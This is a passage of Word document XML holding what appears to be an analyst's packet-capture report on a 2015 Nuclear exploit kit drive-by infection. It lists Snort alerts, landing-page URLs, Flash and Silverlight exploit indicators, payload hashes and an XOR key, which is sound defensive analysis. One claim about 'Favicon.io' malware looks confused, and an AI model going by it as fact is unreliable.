      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Flash Exploit  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF068D3" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve">Snort detects a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662158">
        <w:t>Driveby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve"> Nuclear EK SW M2 related to port 49212 at 23:33:54. </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F24E33" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Packet 2617 is the first in a series of TCP packets [TCP segment of a reassembled PDU] between port 80 and port 49212.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAEFBEF" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve">The TCP stream 55 contains </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBEDED"/>
        </w:rPr>
        <w:t xml:space="preserve">x-flash-version: 11,9,900,117” in the file header and </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve">“ZWS” in the file contents, indicative of a Flash exploit.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A03A79C" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:t>This exploit follows packet 2611 where there’s a “GET” from the landing page “</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>GET /B0hCSgFdUgdNBhhTTAMCBFAHAQIGXFJMAAcESgQNHwZTUh4HBUoCWwc</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2941F6D2" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00162FF6" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve">Later in packet 2630 there’s a </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>GET /favicon.ico</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:t>.  Favicon.io is a malware that creates rogue favicon.ico or random .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662158">
        <w:t>ico</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve"> files which contain malicious PHP code inside them.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A6A663" w14:textId="77777777" w:rsidR="00162FF6" w:rsidRPr="00162FF6" w:rsidRDefault="00162FF6" w:rsidP="00162FF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00162FF6">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>HASH:  c4b1c55a90877d0618c2dc8bad01b33f1d60f3613b3673bdb08465569bdb8236</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4A0479" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="003399"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="689A6DFF" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="003399"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">2015-02-15 17:33:56 | </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Packet 2634</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1" w:themeShade="80"/>
        </w:rPr>
        <w:t>Silverlight Exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077AB9E4" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="003399"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Snort detects a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Driveby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nuclear EK </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>SilverLight</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> M2 related to port 49213 at 23:33:56.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3A02AC" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="003399"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Packet 2634 is the first in a series of TCP packets [TCP segment of a reassembled PDU]  between port 80 and port 49213.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8545B7" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="003399"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">The TCP stream 56 contains a file header that displays  “X-Powered-By: PHP/5.4.35-0+deb7u2”, and the file contents display  “PK”, and there’s a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> file name, “</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>advfgrwqrefq32.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="00007F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> – all indicative of a Silverlight exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D07764" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="006D5725" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="003399"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">This exploit follows packet 2616 where there’s a </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:t>“GET” from the landing page</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>GET /B0hCSgFdUgdNBhhTTAMCBFAHAQIGXFJMAAcESgQNHwZTUh4HBUoXXllHUhY HTTP/1.1\r\n</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">”.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D80FF30" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00BF2E60" w:rsidRDefault="00732326" w:rsidP="00732326">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="003399"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00887510">
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>HASH</w:t>
      </w:r>
      <w:r w:rsidRPr="00732326">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r w:rsidR="0084797A" w:rsidRPr="0084797A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>b4cb839573156364fc2a10a2d0a57cced697f076ce9fe4aa3604ada0b7a77523</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CA8F54" w14:textId="77777777" w:rsidR="00732326" w:rsidRPr="00887510" w:rsidRDefault="00732326" w:rsidP="00887510">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:color w:val="003399"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE980E1" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve">2015-02-15 17:33:57 | </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Packet 2658 </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve"> (for Flash exploit)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5201F8DA" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve">Snort detects a Nuclear EK Payload at 23:33:57 related to port 49212.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B4971E" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve">Packet 2658 is the first in a series of TCP packets </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">[TCP segment of a reassembled PDU] </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve"> between port 80 and port 49212.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B161E29" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:t>Earlier in packet 2655 there’s a “GET” from the landing page “</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>GET /BFleU0pTDlADS1UeAU4HAlYDBQUEVVoATgQHVhkGCRlVVQAcAwUYAElSYi8pUWp9eA HTTP/1.1\r\n</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8FD094" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve">This TCP stream 55 includes a file that to </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>contain several obfuscated ASCII strings with repeating patterns indicative of malware as shown in this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4194C2" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00162FF6" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>(Ex: ...KbXKNgUKK..KN.UKKaXKN#UKKaXKNcUKKaXKNcUKKaXKNcUKKaXKNcUKK.XKNmJ.Ea.B.B.J..y.&amp;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F4ABE6" w14:textId="77777777" w:rsidR="00162FF6" w:rsidRPr="00662158" w:rsidRDefault="008177A4" w:rsidP="00A34C5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">HASH: </w:t>
      </w:r>
      <w:r w:rsidRPr="00887510">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>9d4843ea3f0b0be3b533b50b17e8c1d2460e7136f7a46b4700ea5eb596629d7d</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD079E">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0077542C" w:rsidRPr="00FD079E">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">XOR Key = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0077542C" w:rsidRPr="00FD079E">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>cUKKaXKN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45734CBA" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="735361EC" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve">2015-02-15 17:34:01 | </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Packet 2798</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve"> (for Silverlight exploit)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E084AE" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve">Snort detects a Nuclear EK Payload at 23:34:01 related to port 49213.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204F016C" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve">Packet 2798 is the first in a series of TCP packets </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">[TCP segment of a reassembled PDU] </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve"> between port 80 and port 49213.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F64987" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:t>Earlier in packet 2796 there’s a “GET” from the landing page:  “</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>GET /BFleU0pTDlADS1UeAU4HAlYDBQUEVVoATgQHVhkGCRlVVQAcAwUYAElwVBQmaFZ_SlY HTTP/1.1\r\n</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306F89D9" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve">This TCP stream 56 includes a file that appears to </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>contain several obfuscated ASCII strings with repeating patterns indicative of malware as shown in this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42082073" w14:textId="77777777" w:rsidR="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:t>(Ex: ...KbXKNgUKK..KN.UKKaXKN#UKKaXKNcUKKaXKNcUKKaXKNcUKKaXKNcUKK.XKNmJ.Ea.B.B.J..y.&amp;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD1B4B7" w14:textId="77777777" w:rsidR="008177A4" w:rsidRPr="008177A4" w:rsidRDefault="008177A4" w:rsidP="00732326">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">HASH: </w:t>
      </w:r>
      <w:r w:rsidRPr="00887510">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>9d4843ea3f0b0be3b533b50b17e8c1d2460e7136f7a46b4700ea5eb596629d7d</w:t>
      </w:r>
      <w:r w:rsidRPr="0077542C">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240EC1A0" w14:textId="77777777" w:rsidR="0077542C" w:rsidRPr="009D029E" w:rsidRDefault="0077542C" w:rsidP="00732326">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0077542C">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">XOR Key = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A76618">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>cUKKaXKN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6526D53D" w14:textId="77777777" w:rsidR="00C32455" w:rsidRDefault="00C32455" w:rsidP="00732326">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DCF7541" w14:textId="77777777" w:rsidR="00732326" w:rsidRDefault="00732326" w:rsidP="00732326">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>SUPPORTING EVIDENCE AND SOURCES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD20E43" w14:textId="77777777" w:rsidR="00A76618" w:rsidRPr="00A76618" w:rsidRDefault="00A76618" w:rsidP="00A76618">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2779FD67" w14:textId="77777777" w:rsidR="00732326" w:rsidRDefault="00732326" w:rsidP="00732326">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32455">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>HASH</w:t>
      </w:r>
      <w:r w:rsidR="001057C7">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> in TCP Stream</w:t>
      </w:r>
      <w:r w:rsidR="00BF2E60">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E78E6">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>44</w:t>
      </w:r>
      <w:r w:rsidRPr="00C32455">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00887510">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>9d4843ea3f0b0be3b533b50b17e8c1d2460e7136f7a46b4700ea5eb596629d7d</w:t>
      </w:r>
      <w:r w:rsidR="00C32455" w:rsidRPr="00887510">
        <w:rPr>
          <w:color w:val="FF0000"/>
